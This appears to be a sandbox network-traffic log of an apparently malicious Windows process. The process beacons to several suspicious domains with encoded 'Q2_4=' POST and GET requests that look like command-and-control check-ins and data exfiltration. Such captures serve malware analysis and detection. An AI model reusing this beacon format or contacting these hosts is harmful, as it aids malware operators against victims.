                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:12.113018990 CET | 5308 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49789 | 15.197.148.33 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:14.749298096 CET | 454 | OUT | GET /7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.hyman.life
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:37:14.859739065 CET | 389 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:37:14 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49790 | 104.21.94.87 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:23.054768085 CET | 457 | OUT | GET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nagasl89.baby
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:37:23.683861017 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:23 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              vary: Accept-Encoding
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW7nlen7HPIvQqGTE2%2FHmR2ObGDhzVOqzSU6bAtsN1OvXDoX03OtbTVuNnZ2NnUICTJZGUje1ZZujj2d%2FARVz4jN5TFWiS2dTcuIgCGnBPhy7jOvksIGGVpcc3sIzj%2BCP4e%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ddd94db683442e2-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=103319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49791 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:28.821978092 CET | 753 | OUT | POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCmvAZtmE9D8JGoFs+/u3ue6gHXv2EKaUob1GKt9GjbohJwdN6IozfjU9t9F4Ijm5HAen7Afw6SmrBSwSE7AgOoqqmxv3BKvtbS6n1cg3RZqX871y+5PjC5JI1f1NtsbfTww+7XOL7GCptgHjXgQKxE9pSVsFcQ+0sCAD4LfT2FmANHVRqgvx3QQ==
Nov 5, 2024 15:37:29.149008989 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49792 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:31.478069067 CET | 773 | OUT | POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCnOwZhhQ9I8I0tFs+1O3qe6kHXrmUKsEoaXeKu8GjL4hJ49N7CIyyjUxl9AQIjlFHAcv7AoE5AGrHUwSa2ggOoqqmxvjvKuJbTK31dEjSTKX7rFy+v/jG5JJmfwUlsebTwxO7Wcz6dSoH+3immkT+C9FucL90VexQDWSiWtnSG1c/DloCitwsNb2lHOeT/9C+/WPrOmPSLM8=
                                                                                                              Nov 5, 2024 15:37:31.809813976 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              52 | 192.168.11.20 | 49793 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:34.131946087 CET | 1289 | OUT | POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:34.472951889 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:34 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              53 | 192.168.11.20 | 49794 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:36.785660982 CET | 466 | OUT | GET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:37:37.051381111 CET | 618 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Date: Tue, 05 Nov 2024 14:37:36 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Location: http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              54 | 192.168.11.20 | 49795 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:42.183583021 CET | 729 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 70 49 55 2b 46 74 65 45 4f 57 45 31 79 2b 70 37 2b 66 39 67 47 72 45 71 4d 70 38 65 42 55 59 67 78 6b 36 48 63 44 67 44 59 78 59 52 69 2f 41 76 39 74 5a 2f 47 4c 57 66 4a 76 72 78 59 35 53 4c 2f 72 73 6f 66 75 4a 38 50 47 6c 69 61 4c 33 4d 4c 69 46 6e 6f 2f 70 44 69 71 30 59 6c 32 78 30 63 45 71 48 30 76 51 4e 55 65 4a 51 34 41 63 51 37 56 6b 66 43 34 57 42 30 31 41 53 70 59 41 65 35 76 52 34 57 56 78 64 70 6e 55 53 5a 42 6a 45 6e 68 34 48 54 47 51 79 78 6b 38 62 63 62 33 6d 46 4d 45 34 6a 34 55 54 56 78 51 2b 54 53 56 79 52 78 32 66 49 58 6b 6c 50 35 57 78 66 48 48 52 69 51 3d 3d
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE1y+p7+f9gGrEqMp8eBUYgxk6HcDgDYxYRi/Av9tZ/GLWfJvrxY5SL/rsofuJ8PGliaL3MLiFno/pDiq0Yl2x0cEqH0vQNUeJQ4AcQ7VkfC4WB01ASpYAe5vR4WVxdpnUSZBjEnh4HTGQyxk8bcb3mFME4j4UTVxQ+TSVyRx2fIXklP5WxfHHRiQ==


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              55 | 192.168.11.20 | 49796 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:44.823009014 CET | 749 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=pIU+FteEOWE10u5788VgALEpQ58eaEYkxjyHcClIZDMRiakv+sZ/BLWfCPrOXZSU/rggfuF8PCFiaLnMLRdmpvpB6a0a4mx0cEqH0v0nUfhQ/wAQ60kQcIXz11AStYAa5vRaWUt3pksSZD7Emw4GIWQ4/E9HVZa5Dcs+i7krdgNEfkEoMDC7LE4XLJvZdFGK/ZBZ7cFxNlnbE5s1YHOZvyI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.11.20 | 49797 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:47.462866068 CET | 1289 | OUT | POST /5g7z/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.godskids.store
                                                                                                              Origin: http://www.godskids.store
                                                                                                              Referer: http://www.godskids.store/5g7z/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Data Ascii: Q2_4=[encoded form value]
Nov 5, 2024 15:37:47.462914944 CET | 1289 | OUT | [POST body, continued]
Nov 5, 2024 15:37:47.462968111 CET | 5320 | OUT | [POST body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.11.20 | 49798 | 3.33.130.190 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:50.102979898 CET | 458 | OUT | GET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.godskids.store
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:37:50.213927031 CET | 389 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:37:50 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49799 | 161.97.142.144 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:55.414917946 CET | 726 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17Rlk3WIEfFJs+MSpOktO/zjezl+C6cG3QcKtH/eSZIl4XtiyZM4mHVaZJdO5ko3b58RB+8cBeQanPgjg2mV8URJ48diNiYMfZveSNrhd33W3Iza+byqdtva1CwhABwOrFoZu2JflB1cRQfbfLPiqZ53UqSAZk3Tn12kLakzunekiDcuC2GEBh5AVg==
Nov 5, 2024 15:37:55.602787971 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:37:55 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
Data: [gzip-compressed response body]
Nov 5, 2024 15:37:55.602796078 CET | 317 | IN | [gzip-compressed response body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49800 | 161.97.142.144 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:37:58.136048079 CET | 746 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FMKjDzeTYIl5Xti65M5onVRZJR85ms3b5YRB7AcGoYZo/ghpWmX/kRJ48diNicyfZ3eV9bhfTbR5ozF5byqZtvW1CxyAEUorHQZu35fiTdbbQfBbLOcmagdd+usYHbWt2mtKM1pzVqAhQAcGG/sDj4bIv6wpE684Tsz3gD8oZUP0Ik=
Nov 5, 2024 15:37:58.325383902 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:37:58 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
Data: [gzip-compressed response body]
Nov 5, 2024 15:37:58.325428009 CET | 317 | IN | [gzip-compressed response body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49801 | 161.97.142.144 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:00.851941109 CET | 1289 | OUT | POST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Data Ascii: Q2_4=[encoded form value]
Nov 5, 2024 15:38:00.851991892 CET | 2578 | OUT | [POST body, continued]
Nov 5, 2024 15:38:00.852045059 CET | 4028 | OUT | [POST body, continued]
Nov 5, 2024 15:38:01.040896893 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:38:00 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
Nov 5, 2024 15:38:01.040944099 CET | 317 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49802 | 161.97.142.144 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:03.568806887 CET | 457 | OUT | GET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.030002832.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:03.760319948 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:38:03 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 2966
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: "66cce1df-b96"
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 5, 2024 15:38:03.760343075 CET | 1289 | IN
                                                                                                              Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
Nov 5, 2024 15:38:03.760349989 CET | 592 | IN
                                                                                                              Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49803 | 119.18.54.27 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:09.226814032 CET | 726 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
